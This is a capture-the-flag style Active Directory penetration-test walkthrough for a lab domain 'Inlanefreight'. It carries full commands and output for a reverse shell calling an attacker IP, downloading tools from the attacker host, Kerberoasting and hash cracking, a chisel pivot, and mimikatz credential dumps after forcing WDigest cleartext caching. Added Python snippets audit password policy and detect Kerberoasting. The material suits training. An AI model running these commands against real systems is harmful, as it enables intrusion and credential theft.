Scenario:
A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd!) in place for us to start from in the /uploads directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.
Enumeration
- Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd!) in place for us to start from in the /uploads directory.
We have initial credentials: admin:My_W3bsH3ll_P@ssw0rd!
Based on the info we have, I browse to <url>/uploads:
- When I clicked on antak.aspx, I was directed to the authentication page.
Let's try the credentials provided by the team: admin:My_W3bsH3ll_P@ssw0rd!
I was able to log into the Antak web shell as shown in the image above.
I check systeminfo to understand the system architecture:
Exploitation
Now my head started spinning on how to pop a reverse shell without metasploit, so I created a base 64 payload with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_Port> -f exe -o shell.exe
Now our payload is ready, we need to upload it to the target:
Start nc listener on my attack machine:
nc -lvnp 4466
In the terminal I then run C:\myshell.exe (or whatever your payload is named), and then I have a shell:
To use native PowerShell commands, I type powershell in the shell to switch into PowerShell.
To learn the host identity and domain info, I ran Get-ChildItem Env: | ft key,value:
PS C:\> Get-ChildItem Env: | ft key,value
Get-ChildItem Env: | ft key,value
Key Value
--- -----
ALLUSERSPROFILE C:\ProgramData
APP_POOL_CONFIG C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config
APP_POOL_ID DefaultAppPool
APPDATA C:\Windows\system32\config\systemprofile\AppData\Roaming
CommonProgramFiles C:\Program Files\Common Files
CommonProgramFiles(x86) C:\Program Files (x86)\Common Files
CommonProgramW6432 C:\Program Files\Common Files
COMPUTERNAME WEB-WIN01
ComSpec C:\Windows\system32\cmd.exe
DriverData C:\Windows\System32\Drivers\DriverData
LOCALAPPDATA C:\Windows\system32\config\systemprofile\AppData\Local
NUMBER_OF_PROCESSORS 4
OS Windows_NT
Path C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPower...
PATHEXT .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_ARCHITECTURE AMD64
PROCESSOR_IDENTIFIER AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_LEVEL 25
PROCESSOR_REVISION 0101
ProgramData C:\ProgramData
ProgramFiles C:\Program Files
ProgramFiles(x86) C:\Program Files (x86)
ProgramW6432 C:\Program Files
PROMPT $P$G
PSExecutionPolicyPreference Bypass
PSModulePath WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32...
PUBLIC C:\Users\Public
SystemDrive C:
SystemRoot C:\Windows
TEMP C:\Windows\TEMP
TMP C:\Windows\TEMP
USERDOMAIN INLANEFREIGHT
USERNAME WEB-WIN01$
USERPROFILE C:\Windows\system32\config\systemprofile
windir C:\Windows
COMPUTERNAME : WEB-WIN01
USERDOMAIN : INLANEFREIGHT
👉 Now we confirm:
- machine name
- domain membership
Let's run route print to understand network reachability and pivot opportunities:
PS C:\> route print
route print
===========================================================================
Interface List
7...00 50 56 94 db 4c ......vmxnet3 Ethernet Adapter #2
3...00 50 56 94 9e af ......vmxnet3 Ethernet Adapter
1...........................Software Loopback Interface 1
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 172.16.6.1 172.16.6.100 11
0.0.0.0 0.0.0.0 10.129.0.1 10.129.25.22 15
10.129.0.0 255.255.0.0 On-link 10.129.25.22 271
10.129.25.22 255.255.255.255 On-link 10.129.25.22 271
10.129.255.255 255.255.255.255 On-link 10.129.25.22 271
127.0.0.0 255.0.0.0 On-link 127.0.0.1 331
127.0.0.1 255.255.255.255 On-link 127.0.0.1 331
127.255.255.255 255.255.255.255 On-link 127.0.0.1 331
172.16.0.0 255.255.0.0 On-link 172.16.6.100 266
172.16.6.100 255.255.255.255 On-link 172.16.6.100 266
172.16.255.255 255.255.255.255 On-link 172.16.6.100 266
224.0.0.0 240.0.0.0 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 172.16.6.100 266
224.0.0.0 240.0.0.0 On-link 10.129.25.22 271
255.255.255.255 255.255.255.255 On-link 127.0.0.1 331
255.255.255.255 255.255.255.255 On-link 172.16.6.100 266
255.255.255.255 255.255.255.255 On-link 10.129.25.22 271
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
0.0.0.0 0.0.0.0 172.16.6.1 1
===========================================================================
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
3 271 ::/0 fe80::250:56ff:fe94:a0a0
1 331 ::1/128 On-link
3 271 dead:beef::/64 On-link
3 271 dead:beef::202/128 On-link
3 271 dead:beef::15a2:99e7:f7e2:6c05/128 On-link
7 266 fe80::/64 On-link
3 271 fe80::/64 On-link
3 271 fe80::15a2:99e7:f7e2:6c05/128 On-link
7 266 fe80::5425:f5d2:6282:3a53/128 On-link
1 331 ff00::/8 On-link
7 266 ff00::/8 On-link
3 271 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
From the route table above we confirm that this box is dual-homed (connected to two networks). Two different networks exist:
- 172.16.6.0/16 → internal domain network (guessing this is where the DC is)
- 10.129.0.0/16 → external network
I tried to download fping but had no luck, so I checked for live hosts on the domain network with the one-liner below. It was slow, but I got results back:
6..7 | ForEach-Object { $i = $_; 1..254 | ForEach-Object { if (Test-Connection -ComputerName "172.16.$i.$_" -Count 1 -Quiet) { write-host "172.16.$i.$_ is UP" } } }
We got three IPs back, including our own host IP:
PS C:\> 6..7 | ForEach-Object { $i = $_; 1..254 | ForEach-Object { if (Test-Connection -ComputerName "172.16.$i.$_" -Count 1 -Quiet) { write-host "172.16.$i.$_ is UP" } } }
172.16.6.3 is UP
172.16.6.50 is UP
172.16.6.100 is UP
Then check the password policy with net accounts /domain:
PS C:\> net accounts /domain
net accounts /domain
The request will be processed at a domain controller for domain INLANEFREIGHT.LOCAL.
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 1
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
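As an added defender-side example (Python, not part of the original writeup), here is a small audit that parses the net accounts /domain output above and flags the settings that make the rest of this attack path so easy: a one-character minimum password length and no lockout threshold. The baseline thresholds are assumptions of the example, not a vendor standard.

```python
import re

# Constructed sample: the "net accounts /domain" output captured in the writeup above.
NET_ACCOUNTS_OUTPUT = """\
The request will be processed at a domain controller for domain INLANEFREIGHT.LOCAL.
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 1
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
"""

# Baseline the audit compares against. These thresholds are an assumption for
# this example (in the spirit of common hardening guidance), not a vendor standard.
BASELINE = {
    "Minimum password length": ("min", 14),
    "Length of password history maintained": ("min", 24),
    "Lockout threshold": ("lockout", 10),
    "Lockout duration (minutes)": ("min", 15),
    "Maximum password age (days)": ("max", 365),
}


def parse_net_accounts(text):
    """Turn the 'Setting: value' lines into a dict.

    'Never' / 'Unlimited' become None instead of crashing int(); this is the
    edge case the 'Lockout threshold: Never' line above triggers."""
    policy = {}
    for line in text.splitlines():
        m = re.match(r"^(.+?):\s*(.*)$", line.strip())
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if value.lower() in ("never", "unlimited", "none"):
            policy[key] = None
        elif value.isdigit():
            policy[key] = int(value)
        else:
            policy[key] = value
    return policy


def audit_policy(policy, baseline=BASELINE):
    """Return (setting, observed, reason) tuples for every setting weaker than baseline."""
    findings = []
    for key, (rule, threshold) in baseline.items():
        observed = policy.get(key)
        if rule == "lockout":
            # None (Never) or 0 means unlimited online guesses: spraying is never locked out.
            if observed is None or observed == 0:
                findings.append((key, observed, "no account lockout configured"))
            elif observed > threshold:
                findings.append((key, observed, f"lockout threshold above {threshold}"))
        elif rule == "min" and (observed is None or observed < threshold):
            findings.append((key, observed, f"below baseline of {threshold}"))
        elif rule == "max" and (observed is None or observed > threshold):
            # None here means 'Unlimited', i.e. passwords never expire.
            findings.append((key, observed, f"above baseline of {threshold}"))
    return findings


if __name__ == "__main__":
    for setting, observed, reason in audit_policy(parse_net_accounts(NET_ACCOUNTS_OUTPUT)):
        print(f"[!] {setting}: {observed} ({reason})")
```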
To step up our enumeration, let's download PowerView, move it to the target and import the module:
PS C:\> Import-Module .\PowerView.ps1
Import-Module .\PowerView.ps1
PS C:\> Get-Command Get-DomainUser
Get-Command Get-DomainUser
CommandType Name Version Source
----------- ---- ------- ------
Function Get-DomainUser
Then run Get-DomainUser * -spn | select samaccountname,serviceprincipalname to list the accounts that have SPNs.
Why do we need to check for SPN accounts? These accounts are:
- service accounts
- tied to services (SQL, IIS, etc.)
- often have privileged access
- frequently have weak or reused passwords
- issued TGS (Ticket Granting Service) tickets that any domain user can request, and those tickets are encrypted with the service account's password hash, so they can be cracked offline
PS C:\> Get-DomainUser * -spn | select samaccountname,serviceprincipalname
Get-DomainUser * -spn | select samaccountname,serviceprincipalname
samaccountname serviceprincipalname
-------------- --------------------
azureconnect adfsconnect/azure01.inlanefreight.local
backupjob backupjob/veam001.inlanefreight.local
krbtgt kadmin/changepw
sqltest MSSQLSvc/DEVTEST.inlanefreight.local:1433
sqlqa MSSQLSvc/QA001.inlanefreight.local:1433
sqldev MSSQLSvc/SQL-DEV01.inlanefreight.local:1433
svc_sql MSSQLSvc/SQL01.inlanefreight.local:1433
sqlprod MSSQLSvc/SQL02.inlanefreight.local:1433
We see that the samaccountname for the SPN in question (MSSQLSvc/SQL01.inlanefreight.local:1433) is svc_sql.
Now we can get the TGS ticket in Hashcat format.
PS C:\> Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat
Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat
SamAccountName : svc_sql
DistinguishedName : CN=svc_sql,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
ServicePrincipalName : MSSQLSvc/SQL01.inlanefreight.local:1433
TicketByteHexStream :
Hash : $krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local... (truncated)
Let's try to crack it with hashcat:
┌─[eu-academy-1]─[10.10.14.78]─[htb-ac-2510340@htb-hdniwpyvod]─[~]
└──╼ [★]$ hashcat -m 13100 svc_sql /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433*$033e72a1673fbecec2ba32c7311a3407$... (truncated):lucky7
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/S...48c249
Time.Started.....: Wed Apr 29 10:27:05 2026 (0 secs)
Time.Estimated...: Wed Apr 29 10:27:05 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 691.4 kH/s (2.03ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: 123456 -> lovers1
Started: Wed Apr 29 10:26:56 2026
Stopped: Wed Apr 29 10:27:06 2026
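Flipping this to the blue-team side: the following Python snippet is an added example (not from the original writeup) of what the SPN-ticket step above looks like in Security Event ID 4769 logs. It flags RC4 ticket requests (etype 0x17, the $krb5tgs$23$ format that cracked in seconds above) for user service accounts and alerts when one principal requests several of them inside a short window. The events are constructed to mirror the SPNs enumerated earlier; the window and threshold values are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security Event ID 4769 (Kerberos service ticket requested)
# records, modelled on the SPN accounts enumerated above. Not real log data.
# Fields: timestamp, requesting account, client address, service name, ticket encryption type
EVENTS = [
    ("2026-04-29 10:27:01", "WEB-WIN01$", "172.16.6.100", "svc_sql", "0x17"),
    ("2026-04-29 10:27:01", "WEB-WIN01$", "172.16.6.100", "sqlprod", "0x17"),
    ("2026-04-29 10:27:02", "WEB-WIN01$", "172.16.6.100", "backupjob", "0x17"),
    ("2026-04-29 10:27:02", "WEB-WIN01$", "172.16.6.100", "azureconnect", "0x17"),
    ("2026-04-29 10:27:02", "WEB-WIN01$", "172.16.6.100", "sqldev", "0x17"),
    ("2026-04-29 10:30:15", "tpetty", "172.16.6.50", "svc_sql", "0x12"),   # normal AES256 request
    ("2026-04-29 10:31:00", "MS01$", "172.16.6.50", "DC01$", "0x17"),       # ticket for a machine account
    ("2026-04-29 10:32:10", "tpetty", "172.16.6.50", "krbtgt", "0x17"),     # TGT renewal, not a service
]

# etype 23 = RC4-HMAC: the ticket is encrypted with the NT hash of the service
# account's password, which is why the $krb5tgs$23$ hash above cracked so quickly.
RC4_ETYPE = "0x17"


def is_roastable_request(event):
    """True when a TGS for a user-type service account was requested with RC4.
    Machine accounts ($) have long random passwords and krbtgt is not a
    service, so both are excluded."""
    _, _, _, service, etype = event
    if etype != RC4_ETYPE:
        return False
    return not (service.endswith("$") or service.lower() == "krbtgt")


def detect_kerberoast(events, window=timedelta(minutes=5), min_services=3):
    """Per requesting account, find the largest set of distinct service accounts
    requested with RC4 inside any sliding window; alert when it reaches min_services."""
    by_requester = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            ts = datetime.strptime(ev[0], "%Y-%m-%d %H:%M:%S")
            by_requester[ev[1]].append((ts, ev[3], ev[2]))
    alerts = []
    for requester, reqs in by_requester.items():
        reqs.sort()
        best, start = set(), 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            services = {svc for _, svc, _ in reqs[start:end + 1]}
            if len(services) > len(best):
                best = services
        if len(best) >= min_services:
            alerts.append({
                "requester": requester,
                "client_ip": reqs[0][2],
                "services": sorted(best),
                "first_seen": reqs[0][0].strftime("%Y-%m-%d %H:%M:%S"),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(EVENTS):
        print(f"[!] possible Kerberoast by {alert['requester']} from {alert['client_ip']}: "
              f"{len(alert['services'])} service accounts since {alert['first_seen']}")
```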
The next question is "Submit the contents of the flag.txt file on the Administrator desktop on MS01", so I ran the command below to confirm the MS01 IP address:
PS C:\> Resolve-DnsName MS01
Resolve-DnsName MS01
Name Type TTL Section IPAddress
---- ---- --- ------- ---------
MS01.INLANEFREIGHT.LOCAL A 1200 Answer 172.16.6.50
We are unable to connect directly to MS01 from our attack box, which means we need to set up a proxy, so I chose chisel.
I downloaded chisel, started a python3 web server on my attack machine and uploaded chisel to the target machine:
PS C:\> Invoke-WebRequest http://10.10.14.30:8080/chisel_windows.exe -OutFile C:\chisel_windows.exe
Then we need to start chisel as server on the target:
PS C:\> ./chisel_windows.exe server -p 1234 --socks5
./chisel_windows.exe server -p 1234 --socks5
2026/05/01 07:23:52 server: Fingerprint WtNKsr+iugPQBM7bYUL4YCYLT4P157tKALSdqDCixpU=
2026/05/01 07:23:52 server: Listening on http://0.0.0.0:1234
2026/05/01 07:24:42 server: session#1: Client version (1.10.0) differs from server version (1.10.1)
Now we can start chisel on our attack machine as client:
┌─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-nyd2s4irji]─[~]
└──╼ [★]$ chisel client -v 10.129.28.167:1234 socks
2026/05/01 09:24:42 client: Connecting to ws://10.129.28.167:1234
2026/05/01 09:24:42 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2026/05/01 09:24:42 client: tun: Bound proxies
2026/05/01 09:24:42 client: Handshaking...
2026/05/01 09:24:42 client: Sending config
2026/05/01 09:24:42 client: Connected (Latency 1.637637ms)
2026/05/01 09:24:42 client: tun: SSH connected
Because we are using SOCKS5, we need to edit /etc/proxychains.conf so that its proxy entry matches what the chisel client is listening on, 127.0.0.1:1080 (i.e. socks5 127.0.0.1 1080).
Now that our proxy is set up and we have confirmed the MS01 IP, let's use evil-winrm to get into the machine and submit the flag, prefixing the command with proxychains:
proxychains evil-winrm -i 172.16.6.50 -u svc_sql -p lucky7
We can also RDP into the host:
proxychains xfreerdp /v:<Server_IP> /u:<Username> /p:<Password> /size:1920x1080
While enumerating MS01 I noticed another logged-on user:
PS C:\> query user
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
tpetty console 1 Active none 5/1/2026 4:34 AM
svc_sql rdp-tcp#2 2 Active 1:16 5/1/2026 5:41 AM
Let's upload mimikatz to see if we can get a plain-text password for that user from the host:
PS C:\> upload /home/htb-ac-2510340/mimikatz.exe
Info: Uploading /home/htb-ac-2510340/mimikatz.exe to C:\\mimikatz.exe
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
Info: Upload successful!
Let's run mimikatz with these flags "privilege::debug" "sekurlsa::logonpasswords":
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 1285573 (00000000:00139dc5)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 5/1/2026 5:41:36 AM
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : MS01$
* Domain : INLANEFREIGHT
* NTLM : 8fbaa4a365f38f8148230a72efe206d3
* SHA1 : bed51be11137d6ea159e1952b768de1f04171903
tspkg :
wdigest :
* Username : MS01$
* Domain : INLANEFREIGHT
* Password : (null)
kerberos :
* Username : MS01$
* Domain : INLANEFREIGHT.LOCAL
* Password : f9 60 d9 d2 54 6c d4 dc 9b b6 db 18 48 6a c0 a0 22 37 b7 ee fc 49 d9 30 a5 8c e2 8c ef 62 82 f0 79 78 4b 53 b7 8d a3 fa a3 bd d6 9c a6 6d 44 01 cf 96 b1 5e 45 c6 91 68 08 d4 c9 f3 37 91 09 13 e9 09 63 bd ad e0 21 26 81 d6 57 ab af 26 01 1a 7b 6c 0d 45 87 97 31 84 ec 80 36 b1 23 1f b2 a5 68 c8 81 e1 d0 ac b5 61 a9 4d b0 b6 55 1f ba 89 cf 68 bc a8 2d 4d fd 03 8e 93 b3 b2 1f d8 43 f9 c0 42 5c 29 ce 5d 63 53 81 f6 08 81 d7 af 74 98 84 3e 81 a7 9c 15 a9 0e db af df f2 15 27 1a 81 6b 67 2f 65 07 cc 4c 39 60 51 1c 54 44 33 c7 f0 ed 1b 86 0b a9 3f 07 54 eb a2 e9 a3 f3 63 dc a7 8b 15 57 38 ac 6d 7d 74 4b f3 92 1f 61 68 33 49 a8 1b fd 96 3f a0 d0 a3 3b 7f 54 b8 8b 9e cc 6f 60 85 b4 77 3f f4 f5 3f a3 ee d2 70 32 d6 c8 57
ssp :
credman :
Authentication Id : 0 ; 72704 (00000000:00011c00)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/1/2026 4:33:22 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : MS01$
* Domain : INLANEFREIGHT
* NTLM : 8fbaa4a365f38f8148230a72efe206d3
* SHA1 : bed51be11137d6ea159e1952b768de1f04171903
tspkg :
wdigest :
* Username : MS01$
* Domain : INLANEFREIGHT
* Password : (null)
kerberos :
* Username : MS01$
* Domain : INLANEFREIGHT.LOCAL
* Password : f9 60 d9 d2 54 6c d4 dc 9b b6 db 18 48 6a c0 a0 22 37 b7 ee fc 49 d9 30 a5 8c e2 8c ef 62 82 f0 79 78 4b 53 b7 8d a3 fa a3 bd d6 9c a6 6d 44 01 cf 96 b1 5e 45 c6 91 68 08 d4 c9 f3 37 91 09 13 e9 09 63 bd ad e0 21 26 81 d6 57 ab af 26 01 1a 7b 6c 0d 45 87 97 31 84 ec 80 36 b1 23 1f b2 a5 68 c8 81 e1 d0 ac b5 61 a9 4d b0 b6 55 1f ba 89 cf 68 bc a8 2d 4d fd 03 8e 93 b3 b2 1f d8 43 f9 c0 42 5c 29 ce 5d 63 53 81 f6 08 81 d7 af 74 98 84 3e 81 a7 9c 15 a9 0e db af df f2 15 27 1a 81 6b 67 2f 65 07 cc 4c 39 60 51 1c 54 44 33 c7 f0 ed 1b 86 0b a9 3f 07 54 eb a2 e9 a3 f3 63 dc a7 8b 15 57 38 ac 6d 7d 74 4b f3 92 1f 61 68 33 49 a8 1b fd 96 3f a0 d0 a3 3b 7f 54 b8 8b 9e cc 6f 60 85 b4 77 3f f4 f5 3f a3 ee d2 70 32 d6 c8 57
ssp :
credman :
Authentication Id : 0 ; 1308030 (00000000:0013f57e)
Session : RemoteInteractive from 2
User Name : svc_sql
Domain : INLANEFREIGHT
Logon Server : DC01
Logon Time : 5/1/2026 5:41:37 AM
SID : S-1-5-21-2270287766-1317258649-2146029398-4608
msv :
[00000003] Primary
* Username : svc_sql
* Domain : INLANEFREIGHT
* NTLM : dc3ba1d16d82ac977eea8c22c5de3f82
* SHA1 : c052c598aaed303e20658a4a6341320867d8dcc4
* DPAPI : 32d87218d6331c60d8448418e504b7df
tspkg :
wdigest :
* Username : svc_sql
* Domain : INLANEFREIGHT
* Password : (null)
kerberos :
* Username : svc_sql
* Domain : INLANEFREIGHT.LOCAL
* Password : (null)
ssp :
credman :
mimikatz(commandline) # exit
Bye!
We got back some NTLM hashes, but the user we are after shows (null) as the password. Let's enable WDigest credential caching and try again to see if we get lucky (setting UseLogonCredential to 1 makes LSASS keep clear-text credentials in memory again; this registry change is one defenders commonly monitor for). Still on the host 172.16.6.50:
PS C:\Users\svc_sql.INLANEFREIGHT\Documents> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
The operation completed successfully.
Then restart:
PS C:\Users\svc_sql.INLANEFREIGHT\Documents> shutdown.exe /r /t 0 /f
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
Now let's try mimikatz again:
PS C:\Users\svc_sql.INLANEFREIGHT\Documents> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 55262 (00000000:0000d7de)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/1/2026 9:40:36 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : MS01$
* Domain : INLANEFREIGHT
* NTLM : 2951b92fba38c91eb04c39752106d237
* SHA1 : ae7ad0461a1f52dec0dfc42d44d939af1d3e7e75
tspkg :
wdigest :
* Username : MS01$
* Domain : INLANEFREIGHT
* Password : 38 be 36 a5 5f 82 b1 15 9c 1e a7 1e 3c 2f cf 0e 7e 83 32 e1 52 58 4b d2 11 00 a9 9d 22 e1 00 59 3d 58 23 11 27 fd 1c 9e 5d 99 6e 63 c5 94 5f e4 f4 d5 09 75 e3 b8 60 f9 7b d8 89 31 d4 5c 64 08 6a 29 6f 73 43 ed 38 84 f5 ce 0c 6d a1 48 70 36 89 2d 32 f5 32 81 dd 50 dd 1d 13 3e 5d 48 66 dd 1e 05 b2 4e 13 9c d4 b1 5e 56 d3 d8 c1 57 5e 2f 5f e0 01 ad 3f 4b 15 d3 df 50 77 c1 5b f4 60 76 ae 4a 15 bf ec b3 cc 75 42 9b 8f 7f fb 50 3e fb 73 c7 45 00 18 dd d7 7f a8 3b 83 5a 0f 35 bc bc cf 5d a0 ac f7 fd 2c e8 7c 0b bc 51 c3 42 10 a6 86 c4 75 0a 10 71 50 fb 58 15 78 f3 21 44 53 58 b9 71 ba 48 67 fc 03 b2 36 a2 e5 c5 d9 c4 98 da dc 9c 5c 44 94 45 18 ed 25 af e8 a9 9f 04 38 45 7b 65 48 e7 69 17 07 48 b4 51 24 e2 1a e0 99 84
kerberos :
* Username : MS01$
* Domain : INLANEFREIGHT.LOCAL
* Password : 38 be 36 a5 5f 82 b1 15 9c 1e a7 1e 3c 2f cf 0e 7e 83 32 e1 52 58 4b d2 11 00 a9 9d 22 e1 00 59 3d 58 23 11 27 fd 1c 9e 5d 99 6e 63 c5 94 5f e4 f4 d5 09 75 e3 b8 60 f9 7b d8 89 31 d4 5c 64 08 6a 29 6f 73 43 ed 38 84 f5 ce 0c 6d a1 48 70 36 89 2d 32 f5 32 81 dd 50 dd 1d 13 3e 5d 48 66 dd 1e 05 b2 4e 13 9c d4 b1 5e 56 d3 d8 c1 57 5e 2f 5f e0 01 ad 3f 4b 15 d3 df 50 77 c1 5b f4 60 76 ae 4a 15 bf ec b3 cc 75 42 9b 8f 7f fb 50 3e fb 73 c7 45 00 18 dd d7 7f a8 3b 83 5a 0f 35 bc bc cf 5d a0 ac f7 fd 2c e8 7c 0b bc 51 c3 42 10 a6 86 c4 75 0a 10 71 50 fb 58 15 78 f3 21 44 53 58 b9 71 ba 48 67 fc 03 b2 36 a2 e5 c5 d9 c4 98 da dc 9c 5c 44 94 45 18 ed 25 af e8 a9 9f 04 38 45 7b 65 48 e7 69 17 07 48 b4 51 24 e2 1a e0 99 84
ssp :
credman :
Authentication Id : 0 ; 170825 (00000000:00029b49)
Session : Interactive from 1
User Name : tpetty
Domain : INLANEFREIGHT
Logon Server : DC01
Logon Time : 5/1/2026 9:40:40 AM
SID : S-1-5-21-2270287766-1317258649-2146029398-4607
msv :
[00000003] Primary
* Username : tpetty
* Domain : INLANEFREIGHT
* NTLM : fd37b6fec5704cadabb319cebf9e3a3a
* SHA1 : 38afea42a5e28220474839558f073979645a1192
* DPAPI : da2ec07551ab1602b7468db08b41e3b2
tspkg :
wdigest :
* Username : tpetty
* Domain : INLANEFREIGHT
* Password : Sup3rS3cur3D0m@inU2eR
kerberos :
* Username : tpetty
* Domain : INLANEFREIGHT.LOCAL
* Password : (null)
ssp :
credman :
mimikatz(commandline) # exit
Bye!
Now we got back the plain-text password for tpetty: Sup3rS3cur3D0m@inU2eR
Let's check what the user can do:
PS C:\Users\tpetty> Import-Module .\PowerView.ps1
PS C:\Users\tpetty> $sid = Convert-NameToSid tpetty
PS C:\Users\tpetty> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
ObjectDN : DC=INLANEFREIGHT,DC=LOCAL
ObjectSID : S-1-5-21-2270287766-1317258649-2146029398
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : 89e95b76-444d-4c62-991a-0facbeda640c
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 56
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-5-21-2270287766-1317258649-2146029398-4607
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
ObjectDN : DC=INLANEFREIGHT,DC=LOCAL
ObjectSID : S-1-5-21-2270287766-1317258649-2146029398
ActiveDirectoryRights : ExtendedRight
